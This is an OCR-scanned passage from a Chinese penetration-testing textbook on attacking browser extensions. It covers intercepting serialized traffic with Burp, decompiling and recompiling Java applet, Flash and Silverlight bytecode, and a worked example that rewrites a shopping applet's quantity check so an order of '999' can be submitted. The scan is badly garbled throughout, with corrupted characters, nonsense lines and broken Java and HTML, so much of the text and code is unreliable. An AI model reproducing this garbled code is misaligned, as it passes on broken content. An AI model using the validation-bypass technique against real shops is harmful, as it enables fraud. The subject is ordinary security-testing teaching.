Burp 本 身 文 持 AMEF 格 式 。 确 定 包 含 序 列 化 AMEF 数 据 的 HITP 请 求 或 
响应 后 ， 它 会 解压 缩 并 以 树 状 形式 显示 相关 内 容 ， 以 便于 查看 和 编辑 ， 
如 图 5-5 所 示 。 在 修改 结构 中 的 相关 原 语 数据 项 后 ，Burp 将 重新 对 消息 
进行 序列 化 ， 然 后 就 可 以 将 该 消息 转发 给 服务 器 或 客户 端 ， 由 它们 进行 
处 理 。 








(©) burp suite professional v1.2.14 
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图 5-5 Burp Suite 支 持 AMF 格 式 并 人 允许 查看 和 编辑 去 序列 化 数据 


























@ Silverlight 序 列 化 
Silverlight 应 用 程序 能 够 利用 .NET 平 台 内 置 的 Windows 通 信和 基础 
(WCF) 远程 框架 。 使 用 WCF 的 Silverlight 客 户 端 组 件 通 常 采用 微软 的 
用 于 SOAP 的 .NET 二 进 制 格式 (NET Binary Format for SOAP, 
NBFS) 。 可 以 通过 以 下 Content-Type 消 息 头 辨别 该 格式 : 


Content-Type: application/soap+msbinl 


Burp Proxy 中 的 一 个 插件 能 够 自动 对 NBFS 编 辑 的 数据 进行 去 序列 
化 ， 然 后 在 Burp 的 拦截 窗口 中 显示 这 些 数据 。 在 碍 看 或 编辑 已 解码 的 数 
气 后 ， 该 插件 会 对 数据 重新 进行 编辑 ， 然 后 将 数据 转发 给 服务 器 或 客户 
端 ， 由 它们 进行 处 理 。 








用 于 Burp 的 WCF 二 进 制 SOAP 插 件 由 Brian Holyfield 开 发 ， 可 以 从 
以 下 URL 下 载 该 插件 : 


2. 拦截 浏览 器 扩展 流量 时 遇 到 的 障碍 

如 果 浏 览 器 已 设置 为 使 用 拦截 代理 服务 器 ， 代 理 服务 器 可 能 并 不 会 
拦截 ， 或 无 法 拦截 浏览 器 扩展 组 件 提出 的 请 求 。 之 所 以 出 现 这 种 情况 ， 
可 能 是 由 于 组 件 的 HTTP 代 理 或 SSL 出 现 问 题 ， 或 者 二 者 同时 出 现 问 
题 。 一 般 情况 下 ， 通 过 仔细 配置 代理 服务 器 可 解决 这 个 问题 。 

第 一 个 问题 是 ， 客 户 端 组 件 可 能 并 不 执行 在 浏览 堪 或 计算 机 的 设置 
中 指定 的 代理 配置 。 这 是 因为 组 件 可 能 会 在 浏览 占 本 号 或 扩展 框架 提供 
的 API 以 外 发 出 它们 自己 的 HTTP 请 求 。 出 现 这 种 情况 仍然 可 以 拦截 组 件 
的 请 求 ， 但 需要 修改 计算 机 的 hosts 文 件 以 实现 拦截 目的 ， 同 时 将 代理 服 
务 器 配置 为 支持 匿名 代理 ， 并 自动 重 定 向 到 正确 的 目标 主机 。 更 多 详细 
信息 ， 请 参阅 第 20 章 。 

男 一 个 问题 在 于 ， 客 户 端 组 件 可 能 不 接受 拦截 代理 服务 器 提供 的 
SSL 证 书 。 即 使 代理 服务 器 使 用 的 是 一 般 上 自 签 名 证 书 ， 并 且 浏 览 右 已 配 
置 为 接受 这 类 证 书 ， 但 浏览 器 扩展 组 件 仍 有 可 能 拒绝 此 类 证 书 。 这 可 能 
是 因为 浏览 器 扩展 组 件 不 接受 浏览 器 在 暂时 可 信和 的 证 书 方面 的 配置 ， 或 
者 因为 组 件 本 身 以 编程 方式 要 求 拒绝 接受 不 可 信 的 证 书 。 无 论 是 哪 一 种 
原因 ， 都 可 以 将 代理 服务 器 配置 为 使 用 一 个 主 CA 证 书 〈 用 于 为 访问 的 
每 个 站 点 的 每 台 主 机 签署 有 效 的 证 书 ) ， 并 在 计算 机 的 可 信 证 书库 中 安 
装 该 CA 证 书 ， 从 而 解决 这 个 问题 。 更 多 详细 信息 ， 请 参阅 第 20 章 。 

有 些 时 候 ， 客 户 端 组 件 还 使 用 除 HTTP 以 外 的 协议 进行 通信 ， 而 拦 
截 代 理 服 务 器 却 无 法 处 理 这 些 协 议 。 在 这 些 情况 下 ， 仍 然 可 以 通过 使 用 
网 络 嗅 探 喜 或 功能 挂钩 工具 得 看 并 修改 相关 流量 。Echo Mirage 就 是 一 个 
这 样 的 工具 ， 它 能 够 注入 进程 并 拦截 套 接 字 API 调 用 ， 以 便 查 看 并 修改 
数据 ， 然 后 通过 网 络 传送 修改 后 的 数据 。 可 以 从 以 下 URL 下载 Echo 
Mirage: 


























www. bindshell.net/tools/echomirage 


渗透 测试 步 又 


(1) 确保 代理 服务 器 能 够 正确 拦截 浏览 硕 扩 展 送 出 的 所有 流 
量 。 如 有 必要 ， 使 用 噢 探 器 确定 任何 未 正确 拦截 的 流量 。 

D 如 果 客 户 端 组 件 使 用 标准 的 序列 化 方案 ， 确 保 拥 有 解压 
并 修改 序列 化 数据 所 需 的 工具 。 如 果 浏 览 器 组件 使 用 专用 编码 或 加 
密 机 制 ， 则 需要 解 译 或 调试 该 组 件 ， 对 其 进行 全 面 测 试 。 

C3) 检查 服务 怖 返 回 的 触发 关键 客户 端 逻辑 的 啊 应 。 通 种 ， 
及 时 拦截 并 修改 服务 需 啊 应 能 够 "解锁 ?客户 端 GUI， 从 而 轻松 发 现 
并 执行 复杂 或 多 步骤 特权 操作 。 

(4) 如 果 应 用 程序 执行 不 得 由 客户 端 组 件 执行 的 任何 关键 多 
HREF COU CEM TEL IM REP ACI), KIN, BY DASE 
SAAT GE EM ARS ae aH fs ZA ERR UMRA Pi FE RE 
Se se eee a ate 
漏洞 。 











迄今 为 止 ， 在 对 浏览 器 扩展 组 件 实施 攻击 时 ， 最 彻底 的 方法 ， 是 反 
编译 对 象 、 对 源 代 人 码 进 行 全 面 分 析 、 修 改 源 代码 (如 有 必要 ) 以 改变 对 
象 的 行为 ， 然 后 重新 编译 源 代码 。 如 前 所 述 ， 浏 览 器 扩展 被 编译 成 字 节 
人 码 。 字 节 人 码 是 一 种 由 相关 解释 器 (如 Java 虚 拟 机 或 Flash 播 放 器 ) 执行 
的 、 不 依赖 于 特定 平台 的 高 级 二 进 制 表示 形式 ， 每 种 浏览 器 扩展 技术 都 
使 用 它们 自己 的 字 节 码 格 式 。 因 此 ， 浏 览 器 扩展 能 够 在 解释 器 本 身 可 运 
行 的 任何 平台 上 运行 。 

字 节 人 码 表 示 形 式 的 高 级 本 质 意 味 着 ， 从 理论 上 讲 ， 最 终 可 以 将 字 节 
人 码 反 编译 成 类 似 于 最 初 的 源 代码 的 内 容 。 但 是 ， 字 节 码 可 能 采用 了 各 种 
ens 以 防止 反 编译 ， 或 者 输出 非常 难以 理解 或 解释 的 反 编 译 代 

尽管 字 节 人 码 采 取 了 上 述 防 御 机 制 ， 但 是 ， 在 理解 和 攻击 浏览 器 扩展 
组 件 时 ， 反 编译 字 节 码 仍 然 是 首选 方法 。 通 过 反 编 译 字 节 码 ， 可 以 查看 
客户 端 应 用 程序 的 业务 逻辑 、 访 问 它 的 全 部 功能 ， 以 及 有 针对 性 地 修改 














其 行为 。 
1. 下载 字 节 码 

第 一 步 是 下 载 要 处 理 的 可 执行 字 节 码 。 一 般 情 况 下 ， 字 节 码 会 从 
HTML 源 代码 (运行 浏览 器 扩展 的 应 用 程序 页 面 ) 中 指定 的 URL 加 载 到 
单独 的 文件 中 。Java applet 通 常 使 用 <applet> 标 签 加载 ， 其 他 组 件 则 使 用 
《object〉 标 签 加 载 。 例 如 : 


<applet code="CheckQuantity.class" codebase="/scripts" 





id="CheckQuantityApplet"> 


</fapplet> 


某 些 情况 下 ， 加 载 字 节 码 的 URL 可 能 并 不 是 非常 明显 ， 因 为 组 件 可 
能 使 用 不 同 浏览 器 扩展 框架 提供 的 各 种 包装 脚本 (wrapper script) 进行 
加 载 。 确 定 字 节 码 的 URE 的 另 一 种 方法 ， 是 在 浏览 器 加 载 浏 览 器 扩展 
后 ， 在 代理 服务 器 历史 记录 中 查找 该 UREL。 如 果 采 用 这 种 方法 ， 需 要 了 
解 以 下 两 个 可 能 的 问题 。 

口 一 些 代 理 服 务 器 工具 对 代理 服务 器 历史 记录 应 用 过 滤器 ， 以 隐藏 
渗透 测试 员 通 常 并 不 感 兴 趣 的 视图 项 目 ， 如 图 像 和 样式 表 文件 。 如 果 找 
不 到 与 浏览 器 扩展 字 节 码 有 关 的 请 求 ， 那 么 应 对 代理 服务 器 历史 记录 显 
示 过 滤器 进行 修改 ， 以 显示 所 有 项 目 。 

口 通 常 ， 相 比 于 图 像 等 其 他 静态 资源 ， 浏 览 器 会 在 缓存 中 更 多 地 存 
储 已 下 载 的 扩展 组 件 字 节 码 。 如 果 浏 览 器 已 加 载 某 个 组 件 的 字 节 和 码 ， 那 
么 ， 即 使 完全 刷新 使 用 该 组 件 的 页 面 ， 浏 览 器 也 不 会 再 次 请 求 该 组 件 。 
在 这 种 情况 下 ， 可 能 需要 完全 清除 浏览 器 的 缓存 ， 关 闭 每 一 个 浏览 器 实 
例 ， 然 后 启动 新 的 浏览 器 会 话 ， 才 能 强制 浏览 器 再 次 请 求 字 节 码 。 

确定 浏览 器 扩展 字 节 码 的 URL 后 ， 只 需 将 该 URL 粘 贴 到 浏览 器 的 地 
址 栏 中 ， 然 后 ， 浏 览 器 会 提示 你 将 字 节 码 文 件 保存 到 本 地 文件 系统 中 。 























YY 提示 “如 果 已 在 Burp Proxy 历 史记 录 中 确定 了 与 字 节 人 码 有 关 
的 请 求 ， 并 且 服 务 器 的 啊 应 中 包含 完整 的 字 节 人 码 ( 而 没有 引用 以 前 
缓存 的 副本 ) ， 这 时 ， 可 以 将 字 节 人 码 直 接 保存 到 Burp 内 的 文件 中 。 
最 可 靠 的 方法 是 选择 啊 应 得 看 器 中 的 “标题 ”(Herders) 选项 卡 ， 碳 
键 单 击 包含 啊 应 主体 的 下 方 窗 格 ， 然 后 从 上 下 文采 单 中 选择 “复制 
到 文件 ”(Copy to File) 。 


2. ani Fy 
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得 单个 字 节 码 文件 ， 然 后 再 将 其 反 编 译 成 源 代 码 。 

正常 情况 下 ，Java applet 打 包 成 .jar (Java 档 案 〉 文件 ，Silverlight 对 
象 则 打包 成 .xap 文 件 。 这 两 种 文件 均 使 用 zip 档 案 格 式 ， 因 此 ， 只 需 
用 .zip 扩 展 名 重 命名 这 些 文件 ， 然 后 使 用 任何 .zip 读 取 器 残 可 以 将 它们 解 
压缩 成 单个 的 文件 。Java 字 节 人 码 包含 在 .alass 文 件 中 ，Silverlight 字 节 码 包 
含 在 .dH 文 件 中 。 解 压缩 相关 文件 包 后 ， 需 要 反 编 译 这 些 文件 才能 获得 




















源 代 码 。 
Flash 对 象 打 包 成 ,swf 文件 ， 在 使 用 反 编 译 喜 之 前 ， 不 需要 对 这 类 文 
件 进行 解压 缩 处 理 。 








实际 的 反 编 译 字 节 码 需要 使 用 一 些 特 定 的 工具 ， 这 些 工 具 因 所 采用 
的 浏览 器 扩展 技术 的 类 型 而 异 ， 我 们 将 在 以 下 几 节 介绍 这 些 工 具 。 

è Java 工具 

Java 字 节 码 可 以 使 用 称 为 Jad (Java 反 编译 器 〉 的 工具 反 编 译 成 Java 
源 代码 ， 该 工具 的 下 载 地 址 如 下 : 


www.varaneckas.com/jad 


@ Flash 工具 
Flash 字 节 码 可 以 反 编 译 成 ActionScript 源 代码 。 另 一 种 更 加 有 效 的 
人 
源 代码 。 
要 反 编 译 和 反 汇 编 Flash， 可 以 使 用 以 下 工具 : 
口 Flasm——www.nowrap.de/flasm ; 
D Flare www.nowrap.de/flare; 
4) SWFScan——www.hp.com/go/swfscan (此 工具 针对 Actionscript 2 
和 Actionscript3) 。 
@@ = Silverlight 工具 
Silverlight 字 节 码 可 以 使 用 一 种 称 为 .NET Reflector 的 工具 反 编 译 成 
源 代 码 ， 该 工具 的 下 载 地 址 为 : 
www.red-gate.com/products/dotnet-development/reflector/ 
3. 分 析 源 代码 
获得 组 件 的 源 代码 或 类 似 代码 后 ， 就 可 以 采取 各 种 方法 对 其 实施 攻 
击 。 通 常 ， 第 一 步 是 查看 源 代码 ， 以 了 解 组 件 的 工作 机 制 及 其 包含 或 引 
用 的 功能 。 以 下 是 需要 寻找 的 一 些 项 目 : 
口 在 客户 端 发 生 的 输入 确认 或 其 他 安全 相关 逻辑 和 事件 ; 
口 在 同 服 务 器 传送 数据 之 前 用 于 包装 用 户 提交 的 数据 的 模糊 或 加 密 

















程序 ; 

口 在 用 户 界 面 中 不 可 见 ， 但 可 以 通过 修改 组 件 进行 解锁 的 “隐藏 
的 ”客户 端 功能 ; 

口 对 以 前 未 通过 解析 应 用 程序 确定 的 服务 器 端 功 能 的 引用 。 

通常 ， 碍 看 源 代 码 可 以 揭示 组 件 中 的 一 些 有 趣 的 功能 。 渗 透 测试 员 
硕 望 修改 或 操纵 这 些 功 能 ， 以 确定 洪 在 的 安全 漏洞 。 和 希望 执行 的 操作 包 
H: 删除 客户 端 输入 确认 、 回 服务 器 提交 未 标准 化 的 数据 、 操 纵 客 户 端 
状态 或 事件 ， 或 者 直接 调用 组 件 中 的 功能 。 

如 以 下 几 节 所 述 ， 可 通过 各 种 方式 修改 组 件 的 行为 。 

9 在 浏览 器 中 重新 编译 并 执行 

要 改变 组 件 的 行为 ， 可 以 对 反 编 译 得 到 的 源 代 码 进行 修改 ， 重 新 将 
其 编译 成 字 节 人 码 ， 然 后 在 浏览 器 中 执行 修改 后 的 组 件 。 需 要 操纵 关键 的 
客户 症 事 件 ， 如 在 赌博 应 用 程序 中 摇 山 子 时 ， 通 常 首 选 这 种 方法 。 
要 重新 编译 源 代码 ， 需 要 使 用 与 采用 的 技术 有 关 的 开发 者 工具 。 
口 对 于 Java， 可 以 使 用 JDK 中 的 javac 程 序 重新 编译 修改 后 的 源 代 
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口 对 于 Flash， 可 以 使 用 flasm 重 新 汇编 修改 后 的 字 节 码 ， 或 使 用 
Adobe 的 某 个 Flash 开 发 套件 重新 编译 修改 后 的 ActionScript 源 代码 。 
口 对 于 Silverlight， 可 以 使 用 Visual Studio 重 新 编译 修改 后 的 源 代 


将 源 代码 重新 编译 成 一 个 或 多 个 字 节 码 文件 后 ， 如 果 采 用 的 技术 需 
要 ， 可 能 需要 重新 打包 可 分 配 的 文件 。 对 于 Java 和 Silverlight， 需 要 用 修 
改 后 的 字 节 人 码 文件 蔡 换 已 解压 的 档案 中 的 文件 ， 使 用 zip 实 用 程度 重新 
压缩 这 些 文件 ， 然 后 根据 需要 将 文件 扩展 名 更 改 为 jar 或 .xap。 

最 后 ， 需 要 将 修改 后 的 组 件 加 载 到 浏览 器 中 ， 使 所 做 的 更 改 在 测试 
的 应 用 程序 中 生效 。 可 以 通过 多 种 方式 达到 这 一 目的 。 

口 如 果 可 以 在 浏览 器 的 磁盘 绥 存 中 找到 包含 原始 可 执行 文件 的 物理 
文件 ， 可 以 用 修改 后 的 版 本 玲 换 该 文件 ， 然 后 重新 启动 浏览 器 。 但 是 ， 
如 有 果 浏 览 器 并 不 对 每 个 缓存 的 资源 使 用 不 同 的 文件 ， 或 者 浏览 器 只 是 将 
扩展 组 件 缓存 在 内 存 中 ， 这 种 方法 可 能 无 法 生效 。 

口 可 以 使 用 拦截 代理 服务 器 修改 加 载 组 件 页 面 的 源 代 码 ， 并 指定 另 
一 个 指向 本 地 文件 系统 或 受 控 的 web 服务器 的 URL。 正 常情 况 下 ， 这 种 
方法 很 难 自 效 ， 因 为 更 改 加 载 组 件 的 域 可 能 会 违反 浏览 器 的 同 源 策 略 ， 
而 且 可 能 需要 重新 配置 浏览 器 ， 或 采用 其 他 方法 弱化 同 源 策 略 。 

口 可 以 使 浏览 器 从 原始 服务 器 重新 加 载 组 件 (如 5.3.4 节 所 述 ) ， 使 
用 代理 服务 器 拦截 包含 可 执行 文件 的 啊 应 ， 并 用 修改 后 的 版 本 蔡 换 消 恩 
主体 。 在 Burp Proxy 中 ， 可 以 使 用 “从 文件 中 粘贴 ”(Paste from File) 上 
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下 文 业 单项 达到 这 个 目的 。 通 常 ， 这 是 最 简单 的 方法 ， 也 是 最 不 容易 过 
到 上 述 问题 的 方法 。 

@ 在 浏览 器 以 外 重新 编译 并 执行 

有 些 时 候 ， 并 不 需要 在 执行 组 件 的 过 程 中 修改 组 件 的 行为 。 例 如 ， 
一 些 浏览 器 扩展 组 件 会 确认 用 户 提 交 的 输入 ， 对 这 些 输入 进行 模糊 处 理 
或 加 密 ， 然 后 将 其 传送 至 服务 器 。 在 这 种 情况 下 ， 可 以 对 组 件 进行 修 
改 ， 使 其 对 任何 未 经 确认 的 输入 执行 必要 的 模糊 处 理 或 加 密 ， 并 在 本 地 
输出 结果 。 然 后 ， 可 以 使 用 代理 服务 器 在 原始 组 件 提交 经 过 确认 的 输入 
时 拦截 相关 请 求 ， 并 用 修改 后 的 组 件 输 出 的 值 蔡 换 这 些 请 求 。 

要 实施 这 种 攻击 ， 需 要 对 在 相关 浏览 器 扩展 中 运行 的 原始 可 执行 文 
件 进行 修改 ， 将 其 更 改 为 可 以 在 命令 行 中 运行 的 独立 程序 。 进 行 修改 的 
方式 因 所 采用 的 编程 语言 而 异 。 例 如 ， 在 Java 中 ， 只 需要 实施 main 方 
法 。“Java applet: 可 用 示例 ?小节 将 提供 相关 示例 。 

@ 使 用 JavaScript 操 纵 原 始 组 件 

在 某 些 情况 下 ， 并 不 需要 修改 组 件 的 字 节 码 。 相 反 ， 可 以 通过 修改 
HTML 页面 中 与 组 件 交互 的 JavaScript 来 达到 目的 。 

通过 得 看 组 件 的 源 代 码 ， 可 以 确定 组 件 的 所 有 可 直接 从 JavaScript 调 
用 的 公共 方法 ， 以 及 组 件 处 理 这 些 方法 的 参数 的 方式 。 通 常 ， 除 了 可 以 
从 应 用 程序 页 面 调 用 的 方法 外 ， 还 存在 其 他 一 些 方法 ， 另 外 ， 还 能 够 了 
解 有 关 这 些 方法 的 参数 的 用 途 及 处 理 方式 的 详细 信息 。 

例如 ， 组 件 可 能 会 公开 这 样 的 方法 : 调用 该 方法 可 以 启用 或 禁用 部 
分 可 见 的 用 户 界面 。 使 用 拦截 代理 服务 器 可 以 编辑 加 载 该 组 件 的 HTML 
页 面 ， 修 改 其 中 的 JavaScrip 域 在 其 中 添加 一 些 JavaScript， 以 解锁 被 隐藏 
的 部 分 界面 。 

















渗透 测试 步 又 


(1) 使 用 上 述 拉 巧 下 载 组 件 的 字 节 码 ， 解 压 字 节 人 码 ， 然 后 将 
其 反 编译 成 源 代码 。 

(2) 查看 相关 源 代 码 ， 了 解 组 件 的 执行 过 程 。 

(3) 如 果 组 件 包含 任何 可 进行 操纵 以 实现 目的 的 公共 方法 ， 
可 以 拦截 与 该 组 件 交 互 的 HTML 响 应 ， 并 在 其 中 添加 一 些 
JavaScript， 以 使 用 输入 调用 相应 的 方法 。 

(4) 如 果 组 件 中 不 包含 公共 方法 ， 可 以 通过 修改 组 件 的 源 代 
码 ， 重 新 编译 修改 后 的 代码 ， 然 后 在 浏览 占 中 或 作为 独立 的 程序 执 
行 这 些 代码 ， 从 而 达到 目的 。 

(5) 如 果 组 件 用 于 同 服务 器 提交 模糊 或 加 密 数 据 ， 则 可 以 使 
用 修改 后 的 组 件 同 服务 器 提交 各 种 经 过 适当 模糊 处 理 的 攻击 字符 
串 ， 以 探查 其 中 的 漏洞 ， 就 像 针 对 任何 其 他 参数 实施 攻击 一 样 。 


4. 字 节 码 模 糊 处 理 

由 于 攻击 者 可 轻松 反 编译 字 节 人 码 以 恢复 其 源 代码 ， 因 而 人 们 开发 出 
各 种 技巧 来 对 字 节 码 进行 模糊 处 理 。 经 过 模糊 处 理 的 字 节 码 更 难以 反 编 
译 ， 或 者 反 编译 后 得 到 的 是 可 能 造成 误导 或 无 效 的 源 代码 ， 这 些 代码 非 
党 难以 理解 ， 不 投入 大 量 精 力 无 法 进行 章 新 编译 。 以 下 面 经 过 模糊 处 理 
的 Java 源 代码 为 例 : 








package myapp.interface; 


import myapp.class.public; 
import myapp. throw. throw; 
import if.if.if.if.else; 


import java.awt.event.KeyEvent; 
public class double extends public implements strict 
{ 


public double(j j1) 


mthif({); 
_fldif = jl; 


private void _mthif (ActionEvent actionevent) 


{ 
_mthif(({(KeyEvent) (null))); 
switch(_fldif._mthnew() ._f1dif) 
{ 
case 0: 


_fldfloat.setEnabled(false); 
_fldboolean.setEnabled({false); 
_fidinstanceof.setEnabled(false) ; 
_flidint.setEnabled(false); 

break; 


常用 的 模糊 处 理 技巧 包括 以 下 几 种 。 

口 用 没有 意义 的 表达 式 Ca, b, o 代替 有 意义 的 类 、 方 法 和 成 
员 变 量 名 称 。 这 迫使 阅读 反 编 译 代 码 的 攻击 者 只 有 通过 研究 表达 式 的 使 
用 方法 才能 确定 它们 的 用 途 ， 因 此 他 们 很 难 明 白 这 些 表达 式 的 作用 。 

口 更 进一步 ， 一 些 模糊 处 理工 具 用 new 和 int 之 类 的 保留 关键 字 人 代替 
项 目 名 称 。 虽 然 从 技术 上 讲 ， 这 种 字 节 码 是 非法 的 ， 但 大 多 数 虚拟 机 

CVM) 允许 使 用 这 种 非法 代码 ， 并 正常 执行 它们 。 不 过 ， 尺 管 反 编译 

器 能 够 处 理 非法 字 节 码 ， 但 这 样 得 到 的 源 代码 比 前 一 种 方法 生成 的 源 代 
码 更 加 难以 阅读 。 更 重要 的 是 ， 如 果 不 投 入 大 量 精 力 对 非法 命名 的 数据 
项 统一 进行 重 命 名 ， 束 不 能 重新 编译 源 代 码 。 

口 许 多 模糊 处 理工 具 删 除 字 节 码 中 不 必要 的 调试 和 元 信息 ， 包 括 源 




















MEATS SEROB RRR (EE) 、 局 部 变量 名 称 〈 使 调试 更 麻烦 ) 
和 内 部 类 信息 〈 使 反射 无 法 正常 进行 ) 。 

口 增 加 多 余 的 代码 ， 以 看 似 有 用 的 方式 建立 并 处 理 各 种 数据 ， 但 它 
们 与 应 用 程序 的 功能 实际 使 用 的 数据 并 无 关系 。 

口 使 用 跳 转 指 令 (jump instruction) 对 整个 代码 的 执行 路 径 进行 令 
人 费解 的 修改 ， 致 使 攻击 者 在 疯 读 反 编 译 得 到 的 源 代 人 码 时 无 法 判别 执行 
代码 的 逻辑 顺序 。 

口 引入 非法 的 编程 结构 ， 如 无 法 到 达 的 语句 和 缺少 return 语 句 的 代 
人 码 路 符 。 大 多 数 VM 人 允许 在 字 节 人 码 中 出 现 这 种 结构 ， 但 如 果 不 更 下 非法 
代码 ， 就 无 法 重新 编译 反 编码 得 到 的 源 代码 。 








渗透 测试 步 又 


应 对 字 市 码 模 糊 处 理 的 有 效 策略 取决 于 所 分 析 的 源 代码 使 用 的 
技巧 和 目的 。 以 下 提供 一 些 建议 。 

(1) 不 必 完 全 理解 源 代码 ， 只 需 人 查看 组 件 中 是 否 包 含 公共 方 
法 。 哪 些 方 法 可 以 从 JavaScript 中 调用 ， 它 们 的 签名 是 什么 ， 这 些 内 
容 应 显而易见 。 可 以 通过 提交 各 种 输入 测试 上 述 方法 的 行为 。 

(2) 如 有 果 已 经 使 用 无 意义 的 表达 式 〈 并 非 编程 语言 保留 的 特 
RRF) 代替 类 、 方 法 和 成 员 变 量 名 称 ， 可 以 使 用 许多 IDE 中 内 
置 的 重 构 功能 (refactoring functionality) 帮助 理解 代码 。 通 过 研究 
数据 的 用 法 ， 可 以 给 它们 分 配 有 意义 的 名 称 。IDE 中 的 rename 工 具 
可 以 帮助 完成 许多 工作 ， 在 整个 代码 库 中 追踪 数据 的 用 法 并 对 每 一 
个 数据 进行 重 命名 。 

(3) 选择 适当 的 选项 ， 在 模糊 处 理工 具 中 再 次 对 模糊 处 理 后 
的 字 节 码 进 行 模糊 处 理 ， 这 样 即 可 撤销 许多 模糊 处 理 。Jode 是 一 种 
实用 的 模糊 处 理工 具 ， 它 可 删除 由 其 他 模糊 处 理工 具 添 加 的 多 余 代 
pele 并 可 为 数据 分 配 唯一 的 名 称 ， 为 理解 模糊 处 理 后 的 名 称 提 
EA E.o 














5. Java applet: 可 用 示例 


下 面 以 一 个 在 Java applet 中 执行 输入 确认 的 购物 应 用 程序 为 例 ， 人 简 


要 说 明 如 何 反 编译 浏览 需 扩 展 。 


在 这 个 示例 中 ， 提 交 用 户 请 求 的 订购 数量 的 表单 如 下 所 示 : 
<form method="post" action="Shop.aspx?prod=2" onsubmit="return 
validateForm(this)"> 
<input type="hidden" name="obfped" 
value="k1GSB8X9x0wiw9KGailePdgqaxHIsU5RnojwPdBRgZuixXSB3TgkupaFig3 
UOm8CIPSHIJxpidrPOuCPwé 30gZ2vby iOevPrkxFiuUxA8Gn30clep2Lax6IyuyEU 


DASmG7C"> 


function validateForm(therorm) 


var obfcuantity = 


document. CheckQuantityAppletc.doChoeck I 


theForm.quantity.value, theForm.obfpad.value); 
if {obfcuantity == undefined) 


alert('Please enter a valid quamtity.'); 


return false; 


theForm.quantity.value = obfquantity; 
return true; 
} 
</script> 
<applet code="CheckQuantity.class* cocebase="/scripts"* width="0" 
hei¢ght="0" 
id="CheckQuantityApplet*></applet> 
Product: Samsung Multiverse <br/> 
Price: 399 <br/> 
Quantity: <input type="text” name="quantity’> (Maximum quantity is 50) 
<br/> 
<input type="submit" value="Buy"> 
F Faems 


以 数量 2 提交 该 表单 时 ， 请 提出 以 下 请 求 : 


POST /shop/154/Shor.aspx?prod-2 HTTP/1.1 





Kost: misec.net 
Content-Type: application/x-www-form-urlencoded 


Content-Length: 77 


obfpad=1GSB8X9x0WFW9 XGqi lePdqaxHIsUSRnojwPdBRgZui XSB3Tgkupal igi UQmaCTIPS 


HoxpidrPoug 





CheckQuantity HJJava applet 传 递 用 户 提供 的 数量 和 obfpad 参 数 的 值 。 很 
明显 ，applet 会 执行 必要 的 输入 确认 ， 并 问 脚 本 返回 经 过 模糊 处 理 的 数 
量 ， 然 后 脚本 再 将 该 数量 提交 给 服务 器 。 

由 于 服务 器 端 应 用 程序 确认 订购 数量 为 两 件 ， 因 此 ， 很 明显 ， 
quantity 参 数 会 以 某 种 形式 包含 我 们 请 求 的 值 。 但 是 ， 如 果 我 们 尝试 在 
不 了 解 模糊 算法 的 情况 下 修改 该 参数 ， 攻 击 将 会 失败 ， 因 为 服务 器 无 法 
正确 解析 我 们 提交 的 经 过 模糊 处 理 的 值 。 

在 这 种 情况 下 ， 可 以 使 用 之 前 介绍 的 方法 反 编译 Java applet， 以 此 
了 解 它 的 工作 机 制 。 首 先 ， 需 要 从 HTML 页 面 的 applet 标 签 中 指定 的 
URL 下载 applet 的 字 节 码 : 


/scripts/CheckQuantity.class 








由 于 可 执行 文件 没有 打包 成 jar 文 件 ， 因 此 ， 不 需要 解压 这 个 文件 ， 
可 以 直接 到 下 载 的 .class 文 件 运 行 Jad: 


C:\tmp>jad CheckQuantity.class 
Parsing CheckQuantity.class...The class file versicn is 50.0 (only 45.3, 
46.0 ana 47.0 are supported) 
Generating CheckQuantity.jad 
Couldn't fully decompile method doCheck 


Couldn't resolve all exception handlers in methed doCheck 


Jad 将 经 过 反 编译 的 源 代码 输出 为 jad 文 件 ， 可 以 在 任意 文本 编辑 器 
中 查看 该 文件 : 


// Decompiled by Jad v1.5.8£. Copyright 2001 Pavel Kouznetsov. 
// Jad nome page: http://www.kpdus.com/jad. html 

// Decompiler options: packimports (3) 

// Source File Name: CheckQuantity.java 


import java.applet.Applet; 


public class CheckQuantity extends Applet 
{ 


public CheckQuantity{) 
} 
public String doCheck(String s, String s1) 


int i = 0; 
i = Integer.parseInt(s); 
if{i <= 0 || i > 50) 
return null; 
break MISSING_BLOCK_LABEL_26; 
Rxception exception; 
exception; 
return null; 





String s2 = (new StringBuilder()).append{”*rand=") .append 
(Math. random()) .append("&q=") .append (Integer. toString(i)).append 
("&checked=true"} .toString(); 
StringBuilder stringbuilder = new StringBuilder(); 
for(int j = 0; j < s2.length(); j++) 
{ 
String s3 = (new StringBuilder{)).append('0') .append 
(Integer .toHexString( (byte}sil.charAt((j * 19 + 7) $ sl.length{}} ^ 
s2.charAt(j))).toString(); 
int k = s3.lencth(); 
ifik > 2) 
83 = s3.substring(k - 2, k); 
stringbuilder.append(s3}; 


return stringbuiider.teString(); 
} 
如 经 过 反 编 译 的 源 代 码 所 示 ，Jad 进 行 了 大 量 的 反 编 译 工 作 ， 而 且 
该 applet 的 源 代 码 非 常 简 单 。 使 用 用 户 提 供 的 quantity 参 数 和 应 用 程序 提 
供 的 obfpad 参 数 调用 doCheck 方 法 时 ，applet 首 先 确认 该 数量 是 否 为 介 于 
1 到 50 之 间 的 有 效 数字 。 如 果 数 字 有 效 ， 它 会 使 用 URL 查 询 字 符 串 格式 


创建 一 个 由 名 / 值 对 组 成 的 字符 串 ， 在 其 中 包含 经 过 确认 的 数量 。 最 
后 ， 它 使 用 应 用 程序 提供 的 obfpad 字 符 串 对 以 上 创建 的 字 eee 
操作 ， 对 该 字符 串 进 行 模糊 处 理 。 这 是 一 种 相当 简单 而 常用 的 方法 ， 
通过 对 数据 进行 基本 的 模糊 处 理 来 防止 简单 的 算 改 操作 。 

关于 如 何 反 编译 和 分 析 浏 览 器 扩展 组 件 的 源 代码 ， 我 们 已 经 介绍 了 
各 种 方法 。 在 此 示例 中 ， 人 解析 applet 的 最 简单 方法 如 下 所 示 : 

(1) 修改 doCheck 方 法 ， 取 消 输 入 确认 ， 以 便于 将 任意 字符 串 作 为 
数量 提交 给 服务 器 ; 

(2) 添加 一 个 main 方 法 ， 用 于 从 命令 行 执行 经 过 修改 的 组 件 。 
E iors gochey 并 在 控制 全 打印 经 过 模 籽 处 加 的 
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public class CheckQuantity 
public static voic main(String[] a) 


System.out.printin(caocheck( "999" 


"kl GSBEX9xOWF V9KGai lePdqaxHI sUSRnojwPdBRgZuix TykupaF i ER 
AS YEUD9 SmG7c"*) 


public static String doCheck(String s, String sl) 


{ 
String s2 {new StringBuilder ({)).append{"rand=") . append 
(Math.random({}) .append{"&q=") .append(s) .append 


("&checked=true”"}.toString(); 
StringBuilder stringbuilder = new StringBuilder()}); 
